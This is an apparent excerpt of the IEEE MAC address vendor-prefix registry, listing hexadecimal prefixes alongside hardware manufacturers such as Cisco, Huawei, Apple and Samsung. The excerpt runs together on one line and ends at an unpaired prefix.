Cisco Systems, Inc 5CB15F Oceanblue Cloud Technology Limited 501395 Sichuan AI-Link Technology Co., Ltd. 18D9EF Shuttle Inc. 88DA33 Beijing Xiaoyuer Network Technology Co., Ltd 184644 Home Control Singapore Pte Ltd D0196A Ciena Corporation 84FDD1 Intel Corporate B0700D Nokia 84C78F APS Networks GmbH C09FE1 zte corporation 485DEB Just Add Power 80DABC Megafone Limited 5041B9 I-O DATA DEVICE,INC. 60D248 ARRIS Group, Inc. D49DC0 Samsung Electronics Co.,Ltd 002175 Pacific Satellite International Ltd. 346B5B New H3C Technologies Co., Ltd 84E892 Actiontec Electronics, Inc E0DCFF Xiaomi Communications Co Ltd 846FCE GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 8C0FA0 di-soric GmbH & Co. KG DCB808 Extreme Networks, Inc. E0B655 Beijing Xiaomi Electronics Co., Ltd. C468D0 VTech Telecommunications Ltd. 14AEDB VTech Telecommunications Ltd. 78DB2F Texas Instruments DC7137 zte corporation 20DA22 HUAWEI TECHNOLOGIES CO.,LTD 78E2BD Vodafone Automotive S.p.A. F848FD China Mobile Group Device Co.,Ltd. 20658E HUAWEI TECHNOLOGIES CO.,LTD 183D5E HUAWEI TECHNOLOGIES CO.,LTD 889746 Sichuan AI-Link Technology Co., Ltd. 1CDE57 Fiberhome Telecommunication Technologies Co.,LTD C821DA Shenzhen YOUHUA Technology Co., Ltd F8BBBF eero inc. DCFB48 Intel Corporate FCB662 IC Holdings LLC 48049F ELECOM CO., LTD 087F98 vivo Mobile Communication Co., Ltd. C85261 ARRIS Group, Inc. C04121 Nokia Solutions and Networks GmbH & Co. KG FCD2B6 IEEE Registration Authority 847C9B GD Midea Air-Conditioning Equipment Co.,Ltd. 3441A8 ER-Telecom 04D4C4 ASUSTek COMPUTER INC. A0510B Intel Corporate 7488BB Cisco Systems, Inc A4CF12 Espressif Inc. B0E71D Shanghai Maigantech Co.,Ltd 00778D Cisco Systems, Inc 000E8C Siemens AG 008764 Cisco Systems, Inc A8E2C3 Shenzhen YOUHUA Technology Co., Ltd 9020C2 Aruba, a Hewlett Packard Enterprise Company 70BF92 GN Audio A/S 34DB9C Sagemcom Broadband SAS 7440BE LG Innotek 804A14 Apple, Inc. 703C69 Apple, Inc. 0CA06C Industrial Cyber Sensing Inc. 002F5C Cisco Systems, Inc F4645D Toshiba D07650 IEEE Registration Authority 60D0A9 Samsung Electronics Co.,Ltd 88CEFA HUAWEI TECHNOLOGIES CO.,LTD 002706 YOISYS 042DB4 First Property (Beijing) Co., Ltd Modern MOMA Branch 04E0B0 Shenzhen YOUHUA Technology Co., Ltd C464B7 Fiberhome Telecommunication Technologies Co.,LTD 08ECF5 Cisco Systems, Inc C08C71 Motorola Mobility LLC, a Lenovo Company F46F4E Echowell 2C3F0B Cisco Meraki 4C6AF6 HMD Global Oy 489DD1 Samsung Electronics Co.,Ltd B06FE0 Samsung Electronics Co.,Ltd 44B994 Douglas Lighting Controls AC2DA9 TECNO MOBILE LIMITED 40A93F Pivotal Commware, Inc. 38F85E HUMAX Co., Ltd. 00CB51 Sagemcom Broadband SAS ACBB61 YSTen Technology Co.,Ltd 2479F8 KUPSON spol. s r.o. 7CFD82 GUANGDONG GENIUS TECHNOLOGY CO., LTD. 180D2C Intelbras 78DAA2 Cynosure Technologies Co.,Ltd 38B19E IEEE Registration Authority 38E26E ShenZhen Sweet Rain Electronics Co.,Ltd. ACA31E Aruba, a Hewlett Packard Enterprise Company EC4118 XIAOMI Electronics,CO.,LTD D8860B IEEE Registration Authority 342003 Shenzhen Feitengyun Technology Co.,LTD 98DAC4 TP-LINK TECHNOLOGIES CO.,LTD. 00177B Azalea Networks inc 40E3D6 Aruba, a Hewlett Packard Enterprise Company B45D50 Aruba, a Hewlett Packard Enterprise Company 689A87 Amazon Technologies Inc. 64AE88 Polytec GmbH 00D050 Iskratel d.o.o. F07D68 D-Link Corporation 70C9C6 Cisco Systems, Inc 8084A9 oshkosh Corporation C82832 Beijing Xiaomi Electronics Co., Ltd. C4346B Hewlett Packard 48F17F Intel Corporate 502B98 Es-tech International 701BFB Integrated Device Technology (Malaysia) Sdn. Bhd. 04766E ALPSALPINE CO,.LTD AC7A4D ALPSALPINE CO,.LTD 38C096 ALPSALPINE CO,.LTD 4CC7D6 FLEXTRONICS MANUFACTURING(ZHUHAI)CO.,LTD. C80873 Ruckus Wireless 002643 ALPSALPINE CO,.LTD 003013 NEC Corporation 049DFE Hivesystem D05157 LEAX Arkivator Telecom 0CEC84 Shenzhen TINNO Mobile Technology Corp. BC3E07 Hitron Technologies. Inc 48FDA3 Xiaomi Communications Co Ltd 288088 NETGEAR 004E35 Hewlett Packard Enterprise 1C3477 Innovation Wireless 9CDB07 Yellowtec GmbH F46E95 Extreme Networks, Inc. 9458CB Nintendo Co.,Ltd 28EC9A Texas Instruments 001697 NEC Corporation FC94CE zte corporation 90869B zte corporation E0189F EM Microelectronic F81308 Nokia F8A2D6 Liteon Technology Corporation 74366D Vodafone Italia S.p.A. 30EB5A LANDIS + GYR F80F6F Cisco Systems, Inc C4E506 Piper Networks, Inc. 0080E3 CORAL NETWORK CORPORATION D8F2CA Intel Corporate B4C62E Molex CMS 0CD0F8 Cisco Systems, Inc B8259A Thalmic Labs FCBE7B vivo Mobile Communication Co., Ltd. B40FB3 vivo Mobile Communication Co., Ltd. EC5C68 CHONGQING FUGUI ELECTRONICS CO.,LTD. 282536 SHENZHEN HOLATEK CO.,LTD B8A175 Roku, Inc. 182A44 HIROSE ELECTRONIC SYSTEM CCD3C1 Vestel Elektronik San ve Tic. A.S. 745F90 LAM Technologies A42655 LTI Motion (Shanghai) Co., Ltd. 60A730 Shenzhen Yipinfang Internet Technology Co.,Ltd 3C9BD6 Vizio, Inc 50DB3F SHENZHEN GONGJIN ELECTRONICS CO.,LT 1081B4 Hunan Greatwall Galaxy Science and Technology Co.,Ltd. 004279 Sunitec Enterprise Co.,Ltd A45046 Xiaomi Communications Co Ltd 3881D7 Texas Instruments 1804ED Texas Instruments D43260 GoPro F4DD9E GoPro D4D919 GoPro F85B9C SB SYSTEMS Co.,Ltd 6CA928 HMD Global Oy 00D861 Micro-Star INTL CO., LTD. 74C17D Infinix mobility limited 8871B1 ARRIS Group, Inc. F0AF85 ARRIS Group, Inc. FCAE34 ARRIS Group, Inc. 141114 TECNO MOBILE LIMITED DCDA80 New H3C Technologies Co., Ltd 00B8B3 Cisco Systems, Inc CC7286 Xi'an Fengyu Information Technology Co., Ltd. 64EEB7 Netcore Technology Inc B47748 Shenzhen Neoway Technology Co.,Ltd. F8501C Tianjin Geneuo Technology Co.,Ltd 70D313 HUAWEI TECHNOLOGIES CO.,LTD 9C1D36 HUAWEI TECHNOLOGIES CO.,LTD CCBBFE HUAWEI TECHNOLOGIES CO.,LTD 44070B Google, Inc. ECF6BD SNCF MOBILITÉS 38B4D3 BSH Hausgeraete GmbH B831B5 Microsoft Corporation 007C2D Samsung Electronics Co.,Ltd C84782 Areson Technology Corp. E89363 Nokia 7C0CF6 Guangdong Huiwei High-tech Co., Ltd. 20AD56 Continental Automotive Systems Inc. 5029F5 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 300A60 IEEE Registration Authority 80D065 CKS Corporation FC8F7D SHENZHEN GONGJIN ELECTRONICS CO.,LT 24BE18 DADOUTEK COMPANY LIMITED 749D79 Sercomm Corporation. 00D6FE Cisco Systems, Inc BCAF91 TE Connectivity Sensor Solutions F0D7DC Wesine (Wuhan) Technology Co., Ltd. 007204 Samsung Electronics Co., Ltd. ARTIK 40C81F Shenzhen Xinguodu Technology Co., Ltd. 0CBF74 Morse Micro B41D2B Shenzhen YOUHUA Technology Co., Ltd 14C213 Apple, Inc. CC08FB TP-LINK TECHNOLOGIES CO.,LTD. A4D931 Apple, Inc. BCFED9 Apple, Inc. 808223 Apple, Inc. 1459C0 NETGEAR 283166 vivo Mobile Communication Co., Ltd. C04004 Medicaroid Corporation A4ED43 IEEE Registration Authority 94298D Shanghai AdaptComm Technology Co., Ltd. 00AA6E Cisco Systems, Inc C8C2F5 FLEXTRONICS MANUFACTURING(ZHUHAI)CO.,LTD. F05849 CareView Communications 8CFE74 Ruckus Wireless B86A97 Edgecore Networks Corporation 0C7C28 Nokia Solutions and Networks GmbH & Co. KG 6843D7 Agilecom Photonics Solutions Guangdong Limited 604BAA Magic Leap, Inc. E43493 HUAWEI TECHNOLOGIES CO.,LTD 342912 HUAWEI TECHNOLOGIES CO.,LTD A81087 Texas Instruments 8C61A3 ARRIS Group, Inc. 8C8F8B China Mobile Chongqing branch 00040B 3COM EUROPE LTD 001B6E Keysight Technologies, Inc. A02833 IEEE Registration Authority 000A5E 3COM 00105A 3COM 006097 3COM 006008 3COM 000102 3COM D0D3FC Mios, Ltd. 6C6CD3 Cisco Systems, Inc E049ED Audeze LLC 143719 PT Prakarsa Visi Valutama 582F40 Nintendo Co.,Ltd 0890BA Danlaw Inc 8030E0 Hewlett Packard Enterprise E85D86 CHANG YOW TECHNOLOGIES INTERNATIONAL CO.,LTD. 94A3CA KonnectONE, LLC 4C0143 eero inc. 48A472 Intel Corporate 244CE3 Amazon Technologies Inc. 000157 SYSWAVE CO., LTD 4C364E Panasonic Connect Co., Ltd. BCA58B Samsung Electronics Co.,Ltd 80CEB9 Samsung Electronics Co.,Ltd A8016D Aiwa Corporation 0440A9 New H3C Technologies Co., Ltd B8BEF4 devolo AG E06267 Xiaomi Communications Co Ltd 70B7AA vivo Mobile Communication Co., Ltd. 84B31B Kinexon GmbH F8272E Mercku 14D169 HUAWEI TECHNOLOGIES CO.,LTD F4F197 EMTAKE Inc 6CED51 NEXCONTROL Co.,Ltd 98BB99 Phicomm (Sichuan) Co.,Ltd. 1062E5 Hewlett Packard 04C3E6 IEEE Registration Authority 58FDBE Shenzhen Taikaida Technology Co., Ltd 002622 COMPAL INFORMATION (KUNSHAN) CO., LTD. 0020B5 YASKAWA ELECTRIC CORPORATION 286336 Siemens AG B0B867 Hewlett Packard Enterprise 68DD26 Shanghai Focus Vision Security Technology Co.,Ltd 2866E3 AzureWave Technology Inc. 848A8D Cisco Systems, Inc 1CC3EB GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 000EEE Muco Industrie BV 7C1C4E LG Innotek D8B6B7 Comtrend Corporation 8C14B4 zte corporation 3C9872 Sercomm Corporation. 40C3C6 SnapRoute 9CC950 Baumer Holding F89910 Integrated Device Technology (Malaysia) Sdn. Bhd. 50E0EF Nokia CC50E3 Espressif Inc. DCE305 AO A4DA32 Texas Instruments 780473 Texas Instruments F460E2 Xiaomi Communications Co Ltd E4D124 Mojo Networks, Inc. 0013A3 Siemens Home & Office Comm. Devices 082525 Xiaomi Communications Co Ltd C49500 Amazon Technologies Inc. 60F18A HUAWEI TECHNOLOGIES CO.,LTD 504C7E THE 41ST INSTITUTE OF CETC D01CBB Beijing Ctimes Digital Technology Co., Ltd. C0B6F9 Intel Corporate 7487BB Ciena Corporation A83E0E HMD Global Oy 10C172 HUAWEI TECHNOLOGIES CO.,LTD 144F8A Intel Corporate 002106 RIM Testing Services 2C4759 Beijing MEGA preponderance Science & Technology Co. Ltd DCE0EB Nanjing Aozheng Information Technology Co.Ltd E06066 Sercomm Corporation. 149346 PNI sensor corporation 5CCD7C MEIZU Technology Co.,Ltd. EC8C9A HUAWEI TECHNOLOGIES CO.,LTD B48655 HUAWEI TECHNOLOGIES CO.,LTD D0D783 HUAWEI TECHNOLOGIES CO.,LTD 00151E ETHERNET Powerlink Standarization Group (EPSG) 00111E ETHERNET Powerlink Standarization Group (EPSG) 00409D DigiBoard A41566 WEIFANG GOERTEK ELECTRONICS CO.,LTD 1C965A WEIFANG GOERTEK ELECTRONICS CO.,LTD 401B5F WEIFANG GOERTEK ELECTRONICS CO.,LTD 5C9656 AzureWave Technology Inc. BC5FF6 MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. C8E7D8 MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 00138A Qingdao GoerTek Technology Co., Ltd. A830AD WEIFANG GOERTEK ELECTRONICS CO.,LTD A8E552 JUWEL Aquarium AG & Co. KG AC3B77 Sagemcom Broadband SAS 60D21C Sunnovo International Limited CC51B4 Integrated Device Technology (Malaysia) Sdn. Bhd. 00C3F4 Samsung Electronics Co.,Ltd B88AEC Nintendo Co.,Ltd FCE66A Industrial Software Co 7836CC GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 8CCF5C BEFEGA GmbH CCC92C Schindler - PORT Technology 001E39 Comsys Communication Ltd. 78725D Cisco Systems, Inc 048AE1 FLEXTRONICS MANUFACTURING(ZHUHAI)CO.,LTD. B46BFC Intel Corporate B0FC0D Amazon Technologies Inc. 10B36F Bowei Technology Company Limited FC9BC6 Sumavision Technologies Co.,Ltd C8292A Barun Electronics 0080BA SPECIALIX (ASIA) PTE, LTD 480BB2 IEEE Registration Authority CCC079 Murata Manufacturing Co., Ltd. 70C833 Wirepas Oy 0C73EB IEEE Registration Authority F0B5D1 Texas Instruments 00E000 FUJITSU LIMITED 90848B HDR10+ Technologies, LLC 501D93 HUAWEI TECHNOLOGIES CO.,LTD C8D779 QING DAO HAIER TELECOM CO.,LTD. 9C2EA1 Xiaomi Communications Co Ltd 089734 Hewlett Packard Enterprise 3CCD5D HUAWEI TECHNOLOGIES CO.,LTD 7C7668 HUAWEI TECHNOLOGIES CO.,LTD F09CD7 Guangzhou Blue Cheetah Intelligent Technology Co., Ltd. BCE143 Apple, Inc. 647033 Apple, Inc. 846878 Apple, Inc. C8D083 Apple, Inc. 30D9D9 Apple, Inc. 6030D4 Apple, Inc. F895EA Apple, Inc. 0CF5A4 Cisco Systems, Inc 80C7C5 Fiberhome Telecommunication Technologies Co.,LTD E482CC Jumptronic GmbH 48605F LG Electronics (Mobile Communications) 2816A8 Microsoft Corporation F8F532 ARRIS Group, Inc. B083D6 ARRIS Group, Inc. B0416F Shenzhen Maxtang Computer Co.,Ltd 18F1D8 Apple, Inc. E019D8 BH TECHNOLOGIES 30FD38 Google, Inc. 001386 ABB Inc/Totalflow 003C10 Cisco Systems, Inc F041C8 IEEE Registration Authority CC9916 Integrated Device Technology (Malaysia) Sdn. Bhd. 8C4CDC PLANEX COMMUNICATIONS INC. 5065F3 Hewlett Packard 3C9509 Liteon Technology Corporation A438CC Nintendo Co.,Ltd 74721E Edison Labs Inc. 780F77 HangZhou Gubei Electronics Technology Co.,Ltd EC7FC6 ECCEL CORPORATION SAS 4CABFC zte corporation 7C2A31 Intel Corporate 0CF346 Xiaomi Communications Co Ltd 0C6ABC Fiberhome Telecommunication Technologies Co.,LTD BCAB7C TRnP KOREA Co Ltd 7CFF4D AVM Audiovisuelles Marketing und Computersysteme GmbH 7470FD Intel Corporate C88F26 Skyworth Digital Technology(Shenzhen) Co.,Ltd 6C3838 Marking System Technology Co., Ltd. 64CB5D SIA "TeleSet" 5821E9 TWPI 88E90F innomdlelab 80AD16 Xiaomi Communications Co Ltd 044EAF LG Innotek 1894C6 ShenZhen Chenyee Technology Co., Ltd. BCDDC2 Espressif Inc. 98D863 Shanghai High-Flying Electronics Technology Co., Ltd C49F4C HUAWEI TECHNOLOGIES CO.,LTD 0C704A HUAWEI TECHNOLOGIES CO.,LTD F0E3DC Tecon MT, LLC A8DA01 Shenzhen NUOLIJIA Digital Technology Co.,Ltd B4FBF9 HUAWEI TECHNOLOGIES CO.,LTD 506F77 HUAWEI TECHNOLOGIES CO.,LTD 0C41E9 HUAWEI TECHNOLOGIES CO.,LTD 3CE824 HUAWEI TECHNOLOGIES CO.,LTD 54B7E5 Rayson Technology Co., Ltd. 946372 vivo Mobile Communication Co., Ltd. BC0FA7 Ouster 703A73 Shenzhen Sundray Technologies Company Limited 10F9EB Industria Fueguina de Relojería Electrónica s.a. 70C94E Liteon Technology Corporation 40BD32 Texas Instruments CC8E71 Cisco Systems, Inc 38F554 HISENSE ELECTRIC CO.,LTD 18A28A Essel-T Co., Ltd 0010D8 CALISTA 002194 Ping Communication 5C5AEA FORD 000B7B Test-Um Inc. 70D081 Beijing Netpower Technologies Inc. 003074 EQUIINET LTD. EC9B8B Hewlett Packard Enterprise B0B3AD HUMAX Co., Ltd. 20365B Megafone Limited E8DE00 ChongQing GuanFang Technology Co.,LTD FC643A Samsung Electronics Co.,Ltd A8515B Samsung Electronics Co.,Ltd 001936 STERLITE OPTICAL TECHNOLOGIES LIMITED B89F09 Wistron Neweb Corporation 0402CA Shenzhen Vtsonic Co.,ltd 3CFB5C Fiberhome Telecommunication Technologies Co.,LTD 7440BB Hon Hai Precision Ind. Co.,Ltd. 88BD45 Samsung Electronics Co.,Ltd 54FCF0 Samsung Electronics Co.,Ltd 306A85 Samsung Electronics Co.,Ltd 4CDD31 Samsung Electronics Co.,Ltd 1C1161 Ciena Corporation B4DE31 Cisco Systems, Inc A44027 zte corporation B4F7A1 LG Electronics (Mobile Communications) F0C9D1 GD Midea Air-Conditioning Equipment Co.,Ltd. 347E5C Sonos, Inc. 68AB1E Apple, Inc. 70EF00 Apple, Inc. 28EDE0 AMPAK Technology, Inc. 70F220 Actiontec Electronics, Inc F8C120 Xi'an Link-Science Technology Co.,Ltd C87765 Tiesse SpA D0817A Apple, Inc. 98CA33 Apple, Inc. 345A06 SHARP Corporation BCFFEB Motorola Mobility LLC, a Lenovo Company 2C37C5 Qingdao Haier Intelligent Home Appliance Technology Co.,Ltd CC40D0 NETGEAR 7C7630 Shenzhen YOUHUA Technology Co., Ltd 9822EF Liteon Technology Corporation 7C7635 Intel Corporate 000130 Extreme Networks, Inc. FC0A81 Extreme Networks, Inc. 788038 FUNAI ELECTRIC CO., LTD. 1CEEC9 Elo touch solutions B80716 vivo Mobile Communication Co., Ltd. F045DA Texas Instruments 001862 Seagate Technology 000C50 Seagate Technology 20B399 Enterasys CC2D21 Tenda Technology Co.,Ltd.Dongguan branch 004097 DATEX DIVISION OF 9C4FCF TCT mobile ltd D896E0 Alibaba Cloud Computing Ltd. F417B8 AirTies Wireless Networks 38F73D Amazon Technologies Inc. C0A00D ARRIS Group, Inc. 1C330E PernixData B8F74A RCNTEC ECF451 Arcadyan Corporation 581243 AcSiP Technology Corp. 342AF1 Texas Instruments C8DEC9 Coriant 44D5A5 AddOn Computer 4048FD IEEE Registration Authority A8EEC6 Muuselabs NV/SA E4F042 Google, Inc. 207852 Nokia Solutions and Networks GmbH & Co. KG 0C6111 Anda Technologies SAC 0022C4 epro GmbH 645106 Hewlett Packard 0C1539 Apple, Inc. 002128 Oracle Corporation 001C73 Arista Networks 2C8A72 HTC Corporation 38019F SHENZHEN FAST TECHNOLOGIES CO.,LTD 245CCB AXIe Consortium, Inc. 00BE9E Fiberhome Telecommunication Technologies Co.,LTD 54C57A Sunnovo International Limited 6C5697 Amazon Technologies Inc. 609BC8 Hipad Intelligent Technology Co., Ltd. 406A8E Hangzhou Puwell OE Tech Ltd. 1C0FAF Lucid Vision Labs 58C17A Cambium Networks Limited E0AADB Nanjing PANENG Technology Development Co.,Ltd 0005FF SNS Solutions, Inc. 88B4A6 Motorola Mobility LLC, a Lenovo Company 28CF08 ESSYS F449EF EMSTONE D06726 Hewlett Packard Enterprise ECFAF4 SenRa Tech Pvt. Ltd 38AD8E New H3C Technologies Co., Ltd 34D0B8 IEEE Registration Authority F87B20 Cisco Systems, Inc A89FEC ARRIS Group, Inc. D88F76 Apple, Inc. 409C28 Apple, Inc. 74860B Cisco Systems, Inc 182D98 Jinwoo Industrial system 782D7E TRENDnet, Inc. 741AE0 IEEE Registration Authority 583879 RICOH COMPANY, LTD. 54DF24 Fiberhome Telecommunication Technologies Co.,LTD AC1DDF IEEE Registration Authority E8D819 AzureWave Technology Inc. B06EBF ASUSTek COMPUTER INC. 00A096 MITSUMI ELECTRIC CO.,LTD. 78617C MITSUMI ELECTRIC CO.,LTD. EC51BC GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD F079E8 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 24B209 Avaya Inc FC65DE Amazon Technologies Inc. F44C70 Skyworth Digital Technology(Shenzhen) Co.,Ltd B0935B ARRIS Group, Inc. D8A534 Spectronix Corporation 78321B D-Link International 601803 Daikin Air-conditioning (Shanghai) Co., Ltd. 08661F Palo Alto Networks BC903A Robert Bosch GmbH D0B128 Samsung Electronics Co.,Ltd BC5451 Samsung Electronics Co.,Ltd 74EAC8 New H3C Technologies Co., Ltd B4D64E Caldero Limited F89DBB Tintri D8A01D Espressif Inc. C4F312 Texas Instruments 904E91 IEEE Registration Authority 8CFEB4 VSOONTECH ELECTRONICS CO., LIMITED DC0C2D WEIFANG GOERTEK ELECTRONICS CO.,LTD 5CE8B7 Oraimo Technology Limited CC66B2 Nokia 68ECC5 Intel Corporate 38E2DD zte corporation 885DFB zte corporation 78CA04 Nokia Corporation 3C11B2 Fraunhofer FIT 104B46 Mitsubishi Electric Corporation 0017C8 KYOCERA Display Corporation 940E6B HUAWEI TECHNOLOGIES CO.,LTD 64FB50 RoomReady/Zdi, Inc. 288CB8 zte corporation 78BC1A Cisco Systems, Inc 000E59 Sagemcom Broadband SAS 34298F IEEE Registration Authority 5CEA1D Hon Hai Precision Ind. Co.,Ltd. 181456 Nokia Corporation 48BCA6 ​ASUNG TECHNO CO.,Ltd 005C86 SHENZHEN FAST TECHNOLOGIES CO.,LTD B8DB1C Integrated Device Technology (Malaysia) Sdn. Bhd. 3C10E6 PHAZR Inc. 30053F JTI Co.,Ltd. E048D3 MOBIWIRE MOBILES (NINGBO) CO.,LTD B009DA Ring Solutions 00054F Garmin International 58B42D YSTen Technology Co.,Ltd 58E28F Apple, Inc. 787B8A Apple, Inc. 904506 Tokyo Boeki Medisys Inc. 0021A1 Cisco Systems, Inc 5C546D HUAWEI TECHNOLOGIES CO.,LTD 2880A2 Novatel Wireless Solutions, Inc. 84A1D1 Sagemcom Broadband SAS 909D7D ARRIS Group, Inc. 788C4D Indyme Solutions, LLC F4939F Hon Hai Precision Industry Co., Ltd. 000726 SHENZHEN GONGJIN ELECTRONICS CO.,LT FC8B97 SHENZHEN GONGJIN ELECTRONICS CO.,LT 2CAB25 SHENZHEN GONGJIN ELECTRONICS CO.,LT 1CA532 SHENZHEN GONGJIN ELECTRONICS CO.,LT DCEB53 Wuhan QianXiao Elecronic Technology CO.,LTD EC8AC7 Fiberhome Telecommunication Technologies Co.,LTD 88365F LG Electronics (Mobile Communications) FC7F56 CoSyst Control Systems GmbH 2C4053 Samsung Electronics Co.,Ltd 788102 Sercomm Corporation. 84AA9C MitraStar Technology Corp. 7CBACC IEEE Registration Authority 94F128 Hewlett Packard Enterprise 540237 Teltronic AG 24B2DE Espressif Inc. F0EFD2 TF PAYMENT SERVICE CO., LTD 001F92 Motorola Solutions Inc. 000C03 HDMI Licensing, LLC 0C8FFF HUAWEI TECHNOLOGIES CO.,LTD 54B121 HUAWEI TECHNOLOGIES CO.,LTD A80C63 HUAWEI TECHNOLOGIES CO.,LTD 5CC307 HUAWEI TECHNOLOGIES CO.,LTD 04FA3F Opticore Inc. 404229 Layer3TV, Inc B0EABC ASKEY COMPUTER CORP 94C691 EliteGroup Computer Systems Co., LTD 3CF591 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 602101 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 7CEB7F Dmet Products Corp. 8C8580 Smart Innovation LLC 4CB008 Shenzhen Gwelltimes Technology Co.,Ltd E86FF2 Actiontec Electronics, Inc 005018 AMIT, Inc. E0107F Ruckus Wireless C4017C Ruckus Wireless 0025C4 Ruckus Wireless C0C520 Ruckus Wireless 70DEF9 FAI WAH INTERNATIONAL (HONG KONG) LIMITED FC2F6B Everspin Technologies, Inc. 101B54 HUAWEI TECHNOLOGIES CO.,LTD 287B09 zte corporation DCBE7A Zhejiang Nurotron Biotechnology Co. 3438B7 HUMAX Co., Ltd. 78B28D Beijing Tengling Technology CO.Ltd 88B111 Intel Corporate F81D90 Solidwintech CC0677 Fiberhome Telecommunication Technologies Co.,LTD 784501 Biamp Systems A06A44 Vizio, Inc 54D751 Proximus 14780B Varex Imaging Deutschland AG F44156 Arrikto Inc. 0080C2 IEEE 802.1 Chair ECF342 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD D4258B Intel Corporate 041B6D LG Electronics (Mobile Communications) E45740 ARRIS Group, Inc. 688DB6 AETEK INC. 50FF20 Keenetic Limited 986C5C Jiangxi Gosun Guard Security Co.,Ltd 24792A Ruckus Wireless 309C23 Micro-Star INTL CO., LTD. 145E45 Bamboo Systems Group 8C395C Bit4id Srl 00F82C Cisco Systems, Inc 00C1B1 Cisco Systems, Inc F4FCB1 JJ Corp ACAFB9 Samsung Electronics Co.,Ltd D8C8E9 Phicomm (Shanghai) Co., Ltd. 7CB960 Shanghai X-Cheng telecom LTD B03D96 Vision Valley FZ LLC F894C2 Intel Corporate 70D379 Cisco Systems, Inc 9CC8AE Becton, Dickinson and Company B0359F Intel Corporate C0D962 ASKEY COMPUTER CORP F80BCB Cisco Systems, Inc 100501 PEGATRON CORPORATION E8E732 Alcatel-Lucent Enterprise B47C9C Amazon Technologies Inc. 08028E NETGEAR 181212 Cepton Technologies 70D923 vivo Mobile Communication Co., Ltd. B83A08 Tenda Technology Co.,Ltd.Dongguan branch 50D37F Yu Fly Mikly Way Science and Technology Co., Ltd. 28B448 HUAWEI TECHNOLOGIES CO.,LTD 2C5A0F Cisco Systems, Inc 2C3124 Cisco Systems, Inc 70DB98 Cisco Systems, Inc 30D386 zte corporation 2CFAA2 Alcatel-Lucent Enterprise A49BF5 Hybridserver Tec GmbH F470AB vivo Mobile Communication Co., Ltd. 58821D H. Schomäcker GmbH D8A105 Syslane, Co., Ltd. BCA042 SHANGHAI FLYCO ELECTRICAL APPLIANCE CO.,LTD 9C84BF Apple, Inc. B4A9FE GHIA Technology (Shenzhen) LTD 503DA1 Samsung Electronics Co.,Ltd F097E5 TAMIO, INC 4C1A3D GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 3C0518 Samsung Electronics Co.,Ltd 900628 Samsung Electronics Co.,Ltd 2C1DB8 ARRIS Group, Inc. 1CA0D3 IEEE Registration Authority 9CFCD1 Aetheris Technology (Shanghai) Co., Ltd. 503237 Apple, Inc. B0481A Apple, Inc. B49CDF Apple, Inc. 48BF6B Apple, Inc. 7C2664 Sagemcom Broadband SAS AC6B0F CADENCE DESIGN SYSTEMS INC C8B5AD Hewlett Packard Enterprise 7C3866 Texas Instruments 0C61CF Texas Instruments 9C1D58 Texas Instruments 6C750D WiFiSONG 3805AC Piller Group GmbH 346E9D Ericsson AB F4DC41 YOUNGZONE CULTURE (SHANGHAI) CORP CCCE1E AVM Audiovisuelles Marketing und Computersysteme GmbH 0CF4D5 Ruckus Wireless 6854C1 ColorTokens, Inc. 00111B Targa Systems Div L-3 Communications BC3F8F HUAWEI TECHNOLOGIES CO.,LTD 143004 HUAWEI TECHNOLOGIES CO.,LTD 38AA3C SAMSUNG ELECTRO MECHANICS CO., LTD. 000F4F PCS Systemtechnik GmbH 000302 Charles Industries, Ltd. 0024F1 Shenzhen Fanhai Sanjiang Electronics Co., Ltd. 800010 AT&T 0C3CCD Universal Global Scientific Industrial Co., Ltd. 14ABC5 Intel Corporate C4836F Ciena Corporation A80CCA Shenzhen Sundray Technologies Company Limited 50D213 CviLux Corporation 142FFD LT SECURITY INC 00D0B2 Xiotech Corporation 5CFF35 Wistron Corporation 001E29 Hypertherm Inc 50A4D0 IEEE Registration Authority 7CC6C4 Kolff Computer Supplies b.v. 5004B8 HUAWEI TECHNOLOGIES CO.,LTD 54FA96 Nokia Solutions and Networks GmbH & Co. KG 60334B Apple, Inc. 78F29E PEGATRON CORPORATION 64777D Hitron Technologies. Inc 60D262 Tzukuri Pty Ltd 8404D2 Kirale Technologies SL C891F9 Sagemcom Broadband SAS 9C50EE Cambridge Industries(Group) Co.,Ltd. 40ED98 IEEE Registration Authority 000320 Xpeed, Inc. DCD255 Kinpo Electronics, Inc. ACDCE5 Procter & Gamble Company 00B362 Apple, Inc. E4E4AB Apple, Inc. 38AFD7 FUJITSU LIMITED 28993A Arista Networks 508A0F SHENZHEN FISE TECHNOLOGY HOLDING CO.,LTD. 7CCBE2 IEEE Registration Authority A8A5E2 MSF-Vathauer Antriebstechnik GmbH & Co KG 60427F SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD BCA8A6 Intel Corporate 74FF4C Skyworth Digital Technology(Shenzhen) Co.,Ltd 64EB8C Seiko Epson Corporation A02C36 FN-LINK TECHNOLOGY LIMITED 98FD74 ACT.CO.LTD E0508B Zhejiang Dahua Technology Co., Ltd. 9C1E95 Actiontec Electronics, Inc 68AF13 Futura Mobility 681AB2 zte corporation 7CEBAE Ridgeline Instruments E89EB4 Hon Hai Precision Ind. Co.,Ltd. D46A6A Hon Hai Precision Ind. Co.,Ltd. F48C50 Intel Corporate 001351 Niles Audio Corporation 002590 Super Micro Computer, Inc. AC1F6B Super Micro Computer, Inc. 0C4933 Sichuan Jiuzhou Electronic Technology Co., Ltd. 000064 Yokogawa Digital Computer Corporation D0F73B Helmut Mauell GmbH Werk Weida 180675 Dilax Intelcom GmbH 000FC2 Uniwell Corporation 5098F3 Rheem Australia Pty Ltd 24C1BD CRRC DALIAN R&D CO.,LTD. 00A2EE Cisco Systems, Inc 0059DC Cisco Systems, Inc C8D3FF Hewlett Packard C4BE84 Texas Instruments F4F524 Motorola Mobility LLC, a Lenovo Company 00BBC1 CANON INC. 6CEC5A Hon Hai Precision Ind. CO.,Ltd. 44C346 